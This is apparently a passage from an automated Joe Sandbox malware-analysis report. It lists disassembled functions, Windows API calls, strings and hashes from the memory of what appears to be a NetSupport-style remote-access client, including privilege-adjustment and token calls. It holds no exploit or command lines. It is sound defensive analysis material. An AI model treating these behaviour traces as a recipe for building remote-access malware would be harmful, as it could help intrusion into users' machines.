                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                        • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                        • API String ID: 716802716-1571441106
                                                                                        • Opcode ID: 46fe0e2f6ff4984a5f9afa3624aa9af9987d285b72e85ff2ff450320ced83e56
                                                                                        • Instruction ID: 9b454a0e08db4b844aa329f9a873b431930d9d904307df7fc69ae15b9a8492e5
                                                                                        • Opcode Fuzzy Hash: 46fe0e2f6ff4984a5f9afa3624aa9af9987d285b72e85ff2ff450320ced83e56
                                                                                        • Instruction Fuzzy Hash: 55A2D375E0461A9FEB21CF64CC80BEFB7B9AF44345F0041D9E849A7281EB71AA45CF61
                                                                                        Function 11143570 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1642 11143570-111435b1 GetModuleFileNameA 1643 111435f3 1642->1643 1644 111435b3-111435c6 call 11081b40 1642->1644 1646 111435f9-111435fd 1643->1646 1644->1643 1650 111435c8-111435f1 LoadLibraryA 1644->1650 1648 111435ff-1114360c LoadLibraryA 1646->1648 1649 11143619-11143637 GetModuleHandleA GetProcAddress 1646->1649 1648->1649 1651 1114360e-11143616 LoadLibraryA 1648->1651 1652 11143647-11143670 GetProcAddress * 4 1649->1652 1653 11143639-11143645 1649->1653 1650->1646 1651->1649 1654 11143673-111436eb GetProcAddress * 10 call 11161d01 1652->1654 1653->1654 1656 111436f0-111436f3 1654->1656
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,74DF23A0), ref: 111435A3
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 111435EC
                                                                                        • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11143605
                                                                                        • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11143614
                                                                                        • GetModuleHandleA.KERNEL32(?), ref: 1114361A
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1114362E
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114364D
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11143658
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11143663
                                                                                        • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114366E
                                                                                        • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11143679
                                                                                        • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11143684
                                                                                        • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114368F
                                                                                        • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114369A
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 111436A5
                                                                                        • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 111436B0
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 111436BB
                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 111436C6
                                                                                        • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111436D1
                                                                                        • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111436DC
                                                                                          • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                        • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                        • API String ID: 3874234733-2061581830
                                                                                        • Opcode ID: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                        • Instruction ID: 707b91cc949213dae1a505c6abf15ec2f20ed18dfa7402eb99b54f6ccfa65761
                                                                                        • Opcode Fuzzy Hash: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                        • Instruction Fuzzy Hash: 05411B70A04714AFD7309F768D84A6BFAF8BF55A04B10492EE496D3A10EBB5E8008F5D
                                                                                        Function 11139090 Relevance: 54.7, APIs: 20, Strings: 11, Instructions: 474windowthreadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1713 11139090-111390c5 1714 111390d2-111390d9 1713->1714 1715 111390c7-111390cd GetCurrentThreadId 1713->1715 1716 111390e0-111390fc call 11133920 call 11133400 1714->1716 1717 111390db call 11029330 1714->1717 1715->1714 1723 11139102-11139108 1716->1723 1724 111391db-111391e2 1716->1724 1717->1716 1727 1113975a-11139775 call 11161d01 1723->1727 1728 1113910e-1113916f call 11138c30 IsWindow IsWindowVisible call 11146450 call 1105dd10 IsWindowVisible 1723->1728 1725 1113929a-111392b0 1724->1725 1726 111391e8-111391ef 1724->1726 1738 111392b6-111392bd 1725->1738 1739 111393ef 1725->1739 1726->1725 1729 111391f5-111391fc 1726->1729 1760 111391d1 1728->1760 1761 11139171-11139177 1728->1761 1729->1725 1733 11139202-11139211 FindWindowA 1729->1733 1733->1725 1737 11139217-1113921c IsWindowVisible 1733->1737 1737->1725 1741 1113921e-11139225 1737->1741 1742 111392bf-111392c9 1738->1742 1743 111392ce-111392ee call 1105dd10 1738->1743 1744 111393f1-11139402 1739->1744 1745 11139435-11139440 1739->1745 1741->1725 1747 11139227-1113924c call 11138c30 IsWindowVisible 1741->1747 1742->1745 1743->1745 1766 111392f4-11139323 1743->1766 1749 11139404-11139414 1744->1749 1750 1113941a-1113942f 1744->1750 1751 11139442-11139462 call 1105dd10 1745->1751 1752 11139476-1113947c 1745->1752 1747->1725 1772 1113924e-1113925d IsIconic 1747->1772 1749->1750 1750->1745 1768 11139470 1751->1768 1769 11139464-1113946e call 1102cff0 1751->1769 1755 1113947e-1113948a call 11138c30 1752->1755 1756 1113948d-11139495 1752->1756 1755->1756 1764 111394a7-111394b2 call 1112ce90 1756->1764 1765 11139497-111394a2 call 1106b860 1756->1765 1760->1724 1761->1760 1770 11139179-11139190 call 11146450 GetForegroundWindow 1761->1770 1780 111394b4-111394ba call 11131b00 1764->1780 1781 111394bd-111394c6 1764->1781 1765->1764 1785 11139325-11139339 call 11081a70 1766->1785 1786 1113933e-11139351 call 11143230 1766->1786 1768->1752 1769->1752 1792 11139192-111391bc EnableWindow call 11131210 * 2 EnableWindow 1770->1792 1793 111391be-111391c0 1770->1793 1772->1725 1777 1113925f-1113927a GetForegroundWindow call 11131210 * 2 1772->1777 1814 1113928b-11139294 EnableWindow 1777->1814 1815 1113927c-11139282 1777->1815 1780->1781 1789 111394d4 call 111317a0 1781->1789 1790 111394c8-111394cb 1781->1790 1785->1786 1806 1113933b 1785->1806 1808 11139353-11139364 GetLastError call 11146450 1786->1808 1809 1113936e-11139375 1786->1809 1797 111394d9-111394df 1789->1797 1790->1797 1798 111394cd-111394d2 call 11131870 1790->1798 1792->1793 1793->1760 1802 111391c2-111391c8 1793->1802 1810 111394e5-111394eb 1797->1810 1811 111395e9-111395f4 call 111386b0 1797->1811 1798->1797 1802->1760 1804 111391ca-111391cb SetForegroundWindow 1802->1804 1804->1760 1806->1786 1808->1809 1818 11139377-11139392 1809->1818 1819 111393e8 1809->1819 1820 111394f1-111394f9 1810->1820 1821 1113959b-111395a3 1810->1821 1829 111395f6-11139608 call 110637c0 1811->1829 1830 11139615-1113961b 1811->1830 1814->1725 1815->1814 1824 11139284-11139285 SetForegroundWindow 1815->1824 1832 11139395-111393a1 1818->1832 1819->1739 1820->1811 1827 111394ff-11139505 1820->1827 1821->1811 1825 111395a5-111395e3 call 1103f000 call 1103f040 call 1103f060 call 1103f020 call 1110f270 1821->1825 1824->1814 1825->1811 1827->1811 1833 1113950b-11139522 call 1110f420 1827->1833 1829->1830 1850 1113960a-11139610 call 11142210 1829->1850 1836 11139621-11139628 1830->1836 1837 1113974a-11139752 1830->1837 1838 111393a3-111393b7 call 11081a70 1832->1838 1839 111393bc-111393c9 call 11143230 1832->1839 1847 11139544 1833->1847 1848 11139524-11139542 call 110573b0 1833->1848 1836->1837 1845 1113962e-11139647 call 1105dd10 1836->1845 1837->1727 1838->1839 1854 111393b9 1838->1854 1839->1819 1856 111393cb-111393e6 GetLastError call 11146450 1839->1856 1845->1837 1865 1113964d-11139660 1845->1865 1857 11139546-11139592 call 1110f260 call 1104ce00 call 1104e340 call 1104e3b0 call 1104ce40 1847->1857 1848->1857 1850->1830 1854->1839 1856->1745 1857->1811 1892 11139594-11139599 call 110ebf30 1857->1892 1874 11139662-11139668 1865->1874 1875 1113968d-11139693 1865->1875 1876 1113966a-11139688 call 11146450 GetTickCount 1874->1876 1877 11139699-111396a5 GetTickCount 1874->1877 1875->1837 1875->1877 1876->1837 1877->1837 1881 111396ab-111396eb call 11142e80 call 11146ee0 call 11142e80 call 11025bb0 1877->1881 1899 111396f0-111396f5 1881->1899 1892->1811 1899->1899 1900 111396f7-111396fd 1899->1900 1901 11139700-11139705 1900->1901 1901->1901 1902 11139707-11139731 call 1112c7a0 1901->1902 1905 11139733-11139734 FreeLibrary 1902->1905 1906 1113973a-11139747 call 111618c1 1902->1906 1905->1906 1906->1837
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 111390C7
                                                                                        • IsWindow.USER32(0002043C), ref: 11139125
                                                                                        • IsWindowVisible.USER32(0002043C), ref: 11139133
                                                                                        • IsWindowVisible.USER32(0002043C), ref: 1113916B
                                                                                        • GetForegroundWindow.USER32 ref: 11139186
                                                                                        • EnableWindow.USER32(0002043C,00000000), ref: 111391A0
                                                                                        • EnableWindow.USER32(0002043C,00000001), ref: 111391BC
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 111391CB
                                                                                        • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11139209
                                                                                        • IsWindowVisible.USER32(00000000), ref: 11139218
                                                                                        • IsWindowVisible.USER32(0002043C), ref: 11139248
                                                                                        • IsIconic.USER32(0002043C), ref: 11139255
                                                                                        • GetForegroundWindow.USER32 ref: 1113925F
                                                                                          • Part of subcall function 11131210: ShowWindow.USER32(0002043C,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                          • Part of subcall function 11131210: ShowWindow.USER32(0002043C,11139062,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131246
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 11139285
                                                                                        • EnableWindow.USER32(0002043C,00000001), ref: 11139294
                                                                                        • GetLastError.KERNEL32 ref: 11139353
                                                                                        • GetLastError.KERNEL32 ref: 111393CB
                                                                                        • GetTickCount.KERNEL32 ref: 11139678
                                                                                        • GetTickCount.KERNEL32 ref: 11139699
                                                                                          • Part of subcall function 11025BB0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,111396E2), ref: 11025BB8
                                                                                        • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 11139734
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                        • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                        • API String ID: 2511061093-2542869446
                                                                                        • Opcode ID: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                        • Instruction ID: 168a4b77644d94df8a921335772b55db7e1a21360cf08f879ca3086e41f0bcfd
                                                                                        • Opcode Fuzzy Hash: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                        • Instruction Fuzzy Hash: 700229B8A1062ADFE716DFA4CDD4B6AF766BBC071EF500178E4255728CEB30A844CB51
                                                                                        Function 11115B70 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 182librarycomloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 11115BC5
                                                                                        • CoCreateInstance.OLE32(111C081C,00000000,00000001,111C082C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104BADF), ref: 11115BDF
                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11115C04
                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11115C16
                                                                                        • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11115C29
                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11115C35
                                                                                        • CoUninitialize.COMBASE(00000000), ref: 11115CD1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                                                        • String ID: SHELL32.DLL$SHGetSettings
                                                                                        • API String ID: 4195908086-2348320231
                                                                                        • Opcode ID: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                        • Instruction ID: 591e2108fd72310e634c09c07143bf968b2bad8d72189eb08e80a39284cb5d12
                                                                                        • Opcode Fuzzy Hash: 840c1eadb0258f47a734e7be087c5142de7588e2c7107701b0399a58d14c8a79
                                                                                        • Instruction Fuzzy Hash: 1751A075A0020A9FDB40DFE5C9C4AAFFBB9FF89304F104629E516AB244E731A941CB61
                                                                                        Function 110733B0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _memset
                                                                                        • String ID: NBCTL32.DLL$_License$serial_no
                                                                                        • API String ID: 2102423945-35127696
                                                                                        • Opcode ID: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                        • Instruction ID: b704a80906741011c15d1468992a84ddd821d027e1e1ff2b1c0992d848e69eb8
                                                                                        • Opcode Fuzzy Hash: 1bc3c350b5695b2c8a219e67917739aeea91881a13f4a17e71b6933ab04c4b4d
                                                                                        • Instruction Fuzzy Hash: 64B18E75E00209AFE714CFA8DC81BAEB7F5FF88304F148169E9499B295DB71A901CB90
                                                                                        Function 110310C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(1102E480,?,00000000), ref: 110310E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID: Client32$NSMWClass$NSMWClass
                                                                                        • API String ID: 3192549508-611217420
                                                                                        • Opcode ID: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
                                                                                        • Instruction ID: e21dedaf74b0f8cf59cf3be59171af9e644e6a1753dc25f7f597d2ad8de8aca1
                                                                                        • Opcode Fuzzy Hash: 3211d65015dcc44e5dd59bdf27473333a197f9ceb9b14f7f353df042485d09a4
                                                                                        • Instruction Fuzzy Hash: 44F04F7891112A9FCB06DFA9D890A9EF7E4AB4821CB508165E82587348EB30A605CB95
                                                                                        Function 1109E910 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00B5F810,00B5F810,00B5F810,00B5F810,00B5F810,00B5F810,00B5F810,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                        • EqualSid.ADVAPI32(?,00B5F810,?,00000001,00000001), ref: 1109E9A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InformationToken$AllocateEqualInitialize
                                                                                        • String ID:
                                                                                        • API String ID: 1878589025-0
                                                                                        • Opcode ID: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                        • Instruction ID: 8f268d00a2632c5decc73a479da56acc1190ac8ef7b7f04f8431c56e7d3a1b5e
                                                                                        • Opcode Fuzzy Hash: df3ee88bcedd232c82b95f826b647b916292d8a5149356288e18f949a5596a8a
                                                                                        • Instruction Fuzzy Hash: 22217131B0122EABEB10DBA4CC81BBEB7B8EB44708F100469E919D7184E671AD00CBA1
                                                                                        Function 1109D440 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,1B492F88,00080000,00000000,00000000), ref: 1109D46D
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                        • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
